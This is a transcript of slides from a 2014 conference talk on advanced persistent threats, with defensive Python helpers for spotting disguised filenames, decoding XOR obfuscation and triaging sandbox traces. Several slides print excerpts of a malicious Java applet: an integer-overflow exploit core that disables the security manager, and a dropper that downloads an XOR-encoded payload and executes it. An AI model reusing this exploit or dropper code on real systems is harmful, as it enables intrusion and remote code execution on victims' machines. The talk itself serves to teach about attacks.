The magic world of APT 0.6 - Pompili


description

Slides from Simone Pompili talk @Codemotion Roma 2014

Transcript of The magic world of APT 0.6 - Pompili

Page 1: The magic world of APT 0.6 - Pompili

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROME 11-12.04.2014 www.codemotionworld.com

THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS

Andrea Pompili

There are only 10 types of people in the world:

Those who understand binary, and those who don't

[email protected]

Page 2: The magic world of APT 0.6 - Pompili

Attacker Math (Dino Dai Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf

Page 3: The magic world of APT 0.6 - Pompili

How does an attack develop?

<#1>

<#2>

<#3>

Page 4: The magic world of APT 0.6 - Pompili

<1996> The Dark Side of the Moon

http://vx.org.ua/29a/main.html

Page 5: The magic world of APT 0.6 - Pompili

rem barok -loveletter(vbe) <i hate go to school>

rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines

<2000>

8.7 billion dollars

Page 6: The magic world of APT 0.6 - Pompili

<2001> The Nimda Style

Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability

Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability

Microsoft IE MIME Header Attachment Execution Vulnerability

TFTP Server (UDP:69)

RICHED20.DLL

Microsoft Office 2000 DLL Execution Vulnerability

Microsoft IE MIME Header Attachment Execution Vulnerability

635 million dollars

Page 7: The magic world of APT 0.6 - Pompili

SQL Server 2000 Desktop Engine

75,000 computers infected in just 10 minutes

payload of only 376 bytes (resident exclusively in memory)

1.2 billion dollars

Page 8: The magic world of APT 0.6 - Pompili

22.6 billion dollars

DDoS against www.sco.com

Upload&Execute 0x85 0x13 0x3c 0x9e 0xa2

Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html

Page 9: The magic world of APT 0.6 - Pompili

<2010-2012> Government in Action

> Stuxnet (2010)

> Duqu (2011)

> Flame (2012)

> Gauss (2012)

http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/

Shopping For Zero-Days

Page 10: The magic world of APT 0.6 - Pompili

The most complex malware in history

> 20 MB in size (900 KB main program/dropper + 16 modules identified so far)

> 80 domains used as Command and Control systems

> Spread via USB stick (Infectmedia)

> Bluetooth device enumeration (Beetlejuice)

> Audio recording (Microbe)

> Windows Update MITM (Munch & Gadget)

MD5 Collision Attack

Page 11: The magic world of APT 0.6 - Pompili

<2007> Storm Worm & CyberCrime Market

http://www.pcworld.com/article/138694/article.html

Page 12: The magic world of APT 0.6 - Pompili

http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/


Page 13: The magic world of APT 0.6 - Pompili

Advanced Persistent Threats 101

> Trust Exploitation

Social Engineering, Spear Phishing, Botnet, Drive-to-Click Strategy

Page 14: The magic world of APT 0.6 - Pompili

> Trust Exploitation

> Client Exploitation

Exploit Pack (e.g. Neutrino), 0-Day

Advanced Persistent Threats 101

Page 15: The magic world of APT 0.6 - Pompili

> Trust Exploitation

> Client Exploitation

> Multi-Stage

Shellcoding, Dropper/Downloader, Modules (e.g. RAT, Infostealer, etc.), Good Covert Channel

Advanced Persistent Threats 101

Page 16: The magic world of APT 0.6 - Pompili

> Trust Exploitation

> Client Exploitation

> Multi-Stage

> Multi-Vector

Email, Web Sites, Botnet, Physical (USB)

Advanced Persistent Threats 101

Page 17: The magic world of APT 0.6 - Pompili

> Trust Exploitation

> Client Exploitation

> Multi-Stage

> Multi-Vector

> Resiliency

Camouflaging, Command & Control, Good Covert Channel

Advanced Persistent Threats 101

Page 18: The magic world of APT 0.6 - Pompili

Make or Buy?

Page 19: The magic world of APT 0.6 - Pompili

The Botnet Choice

Page 20: The magic world of APT 0.6 - Pompili

Drive-to-Click <#1>

Page 21: The magic world of APT 0.6 - Pompili

Drive-to-Click <#2>

Page 22: The magic world of APT 0.6 - Pompili

Drive-to-Click <#3>

Page 23: The magic world of APT 0.6 - Pompili

Drive-to-Click <#4>

Page 24: The magic world of APT 0.6 - Pompili

Drive-to-Click <#5>

Page 25: The magic world of APT 0.6 - Pompili

Trick#1> Playing with extensions

RLO Unicode control character

Page 26: The magic world of APT 0.6 - Pompili

Trick#2> Content-Disposition Nightmare

http://www.gnucitizen.org/blog/content-disposition-hacking/

Download Server Response Headers

RFC 2616
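Trick#1 and Trick#2 seen from the defender's side: the Python below is an added example, not code from the talk, that extracts the filename a download's Content-Disposition header hands to the browser and reports what the user would see against what would actually run, flagging the RLO control character, the other bidi controls and double extensions. The sample headers and the right-to-left rendering model are constructed simplifications.

```python
import re
from urllib.parse import unquote

# Unicode bidi control characters; U+202E (RLO) is the one behind the
# "fdp.exe shown as exe.pdf" extension trick, the others are flagged too.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".hta", ".js", ".vbs", ".jar"}
DECOY_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)$", re.I)


def parse_content_disposition(header: str):
    """Return the filename a Content-Disposition header value carries, or None.
    Handles filename="..." and the RFC 5987 filename*=charset''pct-encoded
    form; any directory part is dropped, as a browser does."""
    m = re.search(r"filename\*\s*=\s*([\w-]+)'[^']*'([^;]+)", header, re.I)
    if m:
        name = unquote(m.group(2).strip(), encoding=m.group(1))
    else:
        m = re.search(r'filename\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;]+))', header, re.I)
        if not m:
            return None
        name = m.group(1) if m.group(1) is not None else m.group(2).strip()
    return name.replace("\\", "/").split("/")[-1]


def displayed_name(name: str) -> str:
    """Simplified rendering model: everything after an RLO is drawn
    right-to-left, i.e. reversed, up to the end of the name (a full bidi
    implementation also honours U+202C and the other controls)."""
    head, rlo, tail = name.partition("\u202e")
    return head + tail[::-1] if rlo else name


def inspect_filename(name: str) -> dict:
    controls = [BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS]
    shown = displayed_name(name)
    real_ext = "." + name.rsplit(".", 1)[1].lower() if "." in name else ""
    shown_ext = "." + shown.rsplit(".", 1)[1].lower() if "." in shown else ""
    stem = name[: len(name) - len(real_ext)]
    decoy = bool(DECOY_EXT.search(stem))  # e.g. report.pdf.exe
    suspicious = bool(controls) or (
        real_ext in EXECUTABLE_EXT and (shown_ext != real_ext or decoy)
    )
    return {
        "displayed_name": shown,
        "real_extension": real_ext,
        "displayed_extension": shown_ext,
        "bidi_controls": controls,
        "suspicious": suspicious,
    }


def inspect_header(header: str):
    """Both tricks in one check: the name the download response assigns,
    and whether that name is hiding an executable."""
    name = parse_content_disposition(header)
    return None if name is None else inspect_filename(name)
```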

Page 27: The magic world of APT 0.6 - Pompili

    <applet codebase="http://blahblah.evilsite.in/hiddenpath/"
            archive="http://blahblah.othersite.in/hiddenpath/c8c34734f41cca863a972129369060d9"
            code="rgmiv">

Trick#3> Client Exploiting

Page 28: The magic world of APT 0.6 - Pompili

    public class xp extends JApplet {
        public void init() {
            try {
                Object aobj[] = new Object[0];
                Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
                // junk string assignments inserted by the obfuscator; none of them is ever read
                String s = "hpjwbludyi";
                s = "wgpxrwyvzolbb";
                s = "zdfmvftloqmakqysyu";
                s = "nrrkqnjfylgtljyyferr";
                cr.hzumfnc(obj);
                Object aobj1[] = new Object[0];
                String s1 = "ofvszonrzgelnko";
                s1 = "fefhtspcqhj";
                s1 = "evztavmzjarjgwu";
                // class name and constructor resolved through the reflection helpers shown later
                Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
                    Integer.TYPE
                }).newInstance(new Object[] {
                    Integer.valueOf(tcbteokd.mdrikbua(9))
                });
                int ai[] = new int[8];
                Object aobj2[] = new Object[7];
                aobj2[2] = cr.hzumfnc(obj);
                ...

Page 29: The magic world of APT 0.6 - Pompili

<01> XOR String Encryption

    // decodes to "java.awt.image.SampleModel"
    public static String ok = ha.n("1:-:u:,/u26:<>u\b:6+7>\0264?>7");
    ...
    public static String n(String s) {
        String s1 = "";
        for (int i = 0; i < s.length(); i++)
            s1 += idzfihff(s.charAt(i));
        return s1;
    }
    ...
    public static char idzfihff(char c) {
        return (char)(c ^ 0x5b);   // single-byte XOR, key 0x5b
    }

https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

Malware

Page 30: The magic world of APT 0.6 - Pompili

<02> Java Reflection

    // class lookup by (decoded) name, so no class reference appears in the constant pool
    public static Class fuss(String s) throws Exception {
        return Class.forName(s);
    }
    ...
    // throws clauses added so the fragment compiles; the slide omits them
    public static Object dngfuv(Method method, Object obj, Object aobj[]) throws Exception {
        return method.invoke(obj, aobj);
    }
    public static Constructor bjixqh(Class class1, Class aclass[]) throws Exception {
        return class1.getConstructor(aclass);
    }
    ...

https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

Malware

Page 31: The magic world of APT 0.6 - Pompili

<03> ClassLoader Override

    class t extends ClassLoader {
        public static void ujrzjw(t t1, String s) {
            try {
                // defineClass() is protected, hence the ClassLoader subclass:
                // the class bytes are carried in a static array and never hit disk
                Class class1 = t1.defineClass("qbw",
                    tcbteokd.xcpoalaefqfvuacylvakyi, 0,
                    tcbteokd.xcpoalaefqfvuacylvakyi.length);
                ygigtele.bjixqh(class1, new Class[] {
                    tcbteokd.fuss("java.lang.String")
                }).newInstance(new Object[] { s });
            } catch (Exception ex) {
                System.exit(0);   // any failure ends the applet silently
            }
        }
    }

Malware

Page 32: The magic world of APT 0.6 - Pompili

    ...
    private static void lcsqyrgtbct(String s, int i) {
        String s1 = s + Integer.valueOf(i);   // download URL = base + numeric suffix
        ...
        rchannel = Channels.newChannel((new URL(s1)).openStream());
        ...
        File file = File.createTempFile("~tmf", null);
        FileOutputStream fos = new FileOutputStream(file);
        for (int j = 0; j < abyte0.length; j++)
            abyte0[j] = (byte)(abyte0[j] ^ 0x29);   // payload decoded with a single XOR byte
        fos.write(abyte0);
        if (abyte0.length > 1024)   // only run it when a sizeable payload came back
            try {
                Runtime.getRuntime().exec(new String[] {
                    "cmd.exe", "/C", file.getAbsolutePath()
                });
            } catch (IOException ioe) {
                (new ProcessBuilder(new String[] {
                    file.getAbsolutePath()
                })).start();
            }

The Dropper Class
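The applet reuses one primitive twice: single-byte XOR for its strings (key 0x5b, the ha.n/idzfihff pair on the "XOR String Encryption" slide) and for the downloaded payload (key 0x29 in the dropper above). The Python below is an added analyst helper, not code from the talk or from the malware: it ports the string decoder, lists the keys under which an obfuscated string decodes to a clean class name, and recovers the payload key from the known "MZ" header of a dropped executable. The sample string is the literal from the XOR slide; the payload bytes are constructed.

```python
import string

# The obfuscated literal from the "XOR String Encryption" slide, transcribed
# from the Java source (\b = 0x08, \026 = 0x16).
SAMPLE = "1:-:u:,/u26:<>u\x08:6+7>\x164?>7"

# Characters a decoded Java class or method name is made of.
IDENT_CHARS = set(string.ascii_letters + string.digits + "._$")


def xor_bytes(data: bytes, key: int) -> bytes:
    """The dropper's loop (abyte0[j] ^= 0x29) applied to a whole buffer."""
    return bytes(b ^ key for b in data)


def decode_string(s: str, key: int = 0x5B) -> str:
    """Port of ha.n(): every character XORed with one key byte (0x5b on the slide)."""
    return "".join(chr(ord(c) ^ key) for c in s)


def candidate_string_keys(s: str) -> list:
    """Keys under which the whole string decodes to identifier characters;
    with a real class name inside, the list is short enough to eyeball."""
    return [k for k in range(256) if all(chr(ord(c) ^ k) in IDENT_CHARS for c in s)]


def recover_payload_key(blob: bytes, magic: bytes = b"MZ"):
    """Known-plaintext recovery for a dropped file: a Windows executable starts
    with 'MZ', so the key is the byte that maps the blob's first bytes onto it.
    Returns None when those bytes disagree about the key (not single-byte XOR,
    or not a PE) or the blob is too short."""
    keys = {blob[i] ^ magic[i] for i in range(min(len(magic), len(blob)))}
    return keys.pop() if len(keys) == 1 and len(blob) >= len(magic) else None


if __name__ == "__main__":
    print(decode_string(SAMPLE))
    print([hex(k) for k in candidate_string_keys(SAMPLE)])
    # Constructed stand-in for a downloaded payload: a PE header encoded with 0x29.
    fake_payload = xor_bytes(b"MZ\x90\x00\x03\x00\x00\x00", 0x29)
    print(hex(recover_payload_key(fake_payload)))
```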

Page 33: The magic world of APT 0.6 - Pompili

    Object obj1 = new java.awt.image.DataBufferByte(9);
    int[] ai = new int[8];
    Object[] oo = new Object[7];
    oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
    ...
    DataBufferByte obj5 = new DataBufferByte(8);
    for (int j = 0; j < 8; j++)
        obj5.setElem(j, -1);
    MultiPixelPackedSampleModel obj6 =
        new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 1, 1, 4, 0);
    Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
    // oversized scanline stride: the integer overflow described in the linked write-up
    MultiPixelPackedSampleModel obj8 =
        new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 2, 1,
            0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
    Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
    byte[] obj10 = new byte[] {0, -1};
    IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
    CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
    obj12.compose(obj7, obj9, obj9);

The Malware Core

http://valhalla.allalla.com/2013/08/java-netbeans-applet-integer-overflow-win32-target-added/

Page 34: The magic world of APT 0.6 - Pompili

The Cheaper Path to Exploiting

Blackhole Exploit Kit

http://en.wikipedia.org/wiki/Blackhole_exploit_kit

Styx Exploit Pack

http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto

Neutrino

http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

RedKit

http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html

Page 35: The magic world of APT 0.6 - Pompili

The InfoStealer Choice

Page 36: The magic world of APT 0.6 - Pompili

The RAT Choice

Page 37: The magic world of APT 0.6 - Pompili

Bitcoin + APT = Ransomware

Page 38: The magic world of APT 0.6 - Pompili

The Command&Control Choice <#1>

Page 39: The magic world of APT 0.6 - Pompili

The Command&Control Choice <#2>

Page 40: The magic world of APT 0.6 - Pompili

The Command&Control Choice <#3>

Page 41: The magic world of APT 0.6 - Pompili

The Command&Control Choice <#4>

Page 42: The magic world of APT 0.6 - Pompili

“The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose.”

Mikko Hypponen (F-Secure)

<2012> The Antivirus Maker Confession

Page 43: The magic world of APT 0.6 - Pompili

The Way to Sandboxing

Page 44: The magic world of APT 0.6 - Pompili

<01> USER-MODE AGENT

Software component in a guest operating system (keylogger)

<02> KERNEL-MODE PATCHING

Guest operating system kernel modified for tracing (rootkit)

<03> VIRTUAL MACHINE MONITORING

Customized hypervisor to monitor the guest operating system

<04> SYSTEM EMULATION

Hardware emulator to hook appropriate memory, IO functions, peripherals, etc.

<05> KERNEL EMULATION

Kernel emulator to hook appropriate system calls, etc.

The Way to Sandboxing

Page 45: The magic world of APT 0.6 - Pompili

A (very) partial list of the players

> Norman Sandbox (Norway 2001)

> FireEye (US 2004)

> Damballa (US 2006)

> Lastline/Anubis/Wepawet (Austria 2006)

> Sandboxie (2006)

> Cuckoo Sandbox (2010)

> VMRay formerly CWSandbox (Germany 2007)

> Joe Security LLC (Switzerland 2007)

> BitBlaze (2008)

> ThreatExpert (Ireland 2008)

> Ether (US 2009)

Page 46: The magic world of APT 0.6 - Pompili

Page 47: The magic world of APT 0.6 - Pompili

A (completely) partial list of the evaders

Page 48: The magic world of APT 0.6 - Pompili

Evading Sandbox 4 Dummies

> Human Interaction (UpClicker, December 2012)

> MessageBox (something that needs to be clicked)

> Sleep Calls (Trojan Nap, uncovered in February 2013)

> Time Triggers (Hastati, March 2013: a massive, data-destroying attack in South Korea)

> Check Internet Connection

> Check Volume information and Size

> Check self Executable name

> Execution after reboot

> Check System services, files and communication ports
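To put that checklist to work on the analysis side, the Python below (an added example, not from the talk) tags a sandbox API trace with the evasion behaviours listed above and sums the requested sleep time against the sandbox's analysis budget, which is what the "Sleep Calls" entry exploits. The trace lines are constructed for the example; the rules use the usual Win32 API names for each check and are an assumption, not an exhaustive mapping.

```python
import re

# Constructed sandbox API trace (not from a real sample): one call per line,
# written as  api(args) -> result
TRACE = """\
GetModuleFileNameW() -> C:\\sandbox\\sample_2f1a.exe
MessageBoxW(hwnd=0, text="Click OK to continue") -> 1
Sleep(ms=300000) -> 0
Sleep(ms=300000) -> 0
GetVolumeInformationW(root="C:\\") -> serial=0x1A2B3C4D
GetDiskFreeSpaceExW(root="C:\\") -> total=21474836480
InternetCheckConnectionW(url="http://www.microsoft.com") -> 0
GetLocalTime() -> 2013-03-20 14:00:00
RegSetValueExW(key="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", name="upd") -> 0
EnumServicesStatusW(scm=0x4c) -> 57
"""

# Each bullet of the checklist mapped to the Win32 calls that usually implement it.
RULES = [
    ("Human Interaction / MessageBox", r"^MessageBox(Ex)?[AW]?\("),
    ("Time Triggers", r"^(GetLocalTime|GetSystemTime(AsFileTime)?|GetTickCount(64)?)\("),
    ("Check Internet Connection", r"^(InternetCheckConnection[AW]?|InternetGetConnectedState|IcmpSendEcho)\("),
    ("Check Volume information and Size", r"^(GetVolumeInformation[AW]?|GetDiskFreeSpace(Ex)?[AW]?)\("),
    ("Check self Executable name", r"^GetModuleFileName(Ex)?[AW]?\("),
    ("Execution after reboot", r"^RegSetValueEx[AW]?\(.*CurrentVersion\\Run"),
    ("Check System services, files and communication ports", r"^(OpenSCManager[AW]?|EnumServicesStatus(Ex)?[AW]?)\("),
]
SLEEP_CALL = re.compile(r"^(?:Sleep|SleepEx|NtDelayExecution)\(ms=(\d+)")


def triage(trace: str, sleep_budget_ms: int = 120_000) -> dict:
    """Tag a trace with the evasion behaviours it shows. Sleeps are summed and
    only count once the total exceeds the sandbox's analysis budget, since a
    few short sleeps are normal for benign software."""
    found, total_sleep = set(), 0
    for line in trace.splitlines():
        line = line.strip()
        m = SLEEP_CALL.match(line)
        if m:
            total_sleep += int(m.group(1))
            continue
        for label, pattern in RULES:
            if re.match(pattern, line):
                found.add(label)
    if total_sleep > sleep_budget_ms:
        found.add("Sleep Calls")
    return {"techniques": sorted(found), "total_sleep_ms": total_sleep, "score": len(found)}


if __name__ == "__main__":
    for key, value in triage(TRACE).items():
        print(f"{key}: {value}")
```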

Page 49: The magic world of APT 0.6 - Pompili

The limit of sandboxes

(chart; axis: minutes)

def: Patient Zero is the first patient identified in the population sample of an epidemiological investigation…

Page 50: The magic world of APT 0.6 - Pompili

Certainly better than trusting the users

Page 51: The magic world of APT 0.6 - Pompili

Domande? Italian

مطالب أية Arabic

¿Preguntas? Spanish

Questions? English

tupoQghachmey Klingon

Sindarin

Japanese

Ερωτήσεις? Greek

вопросы? Russian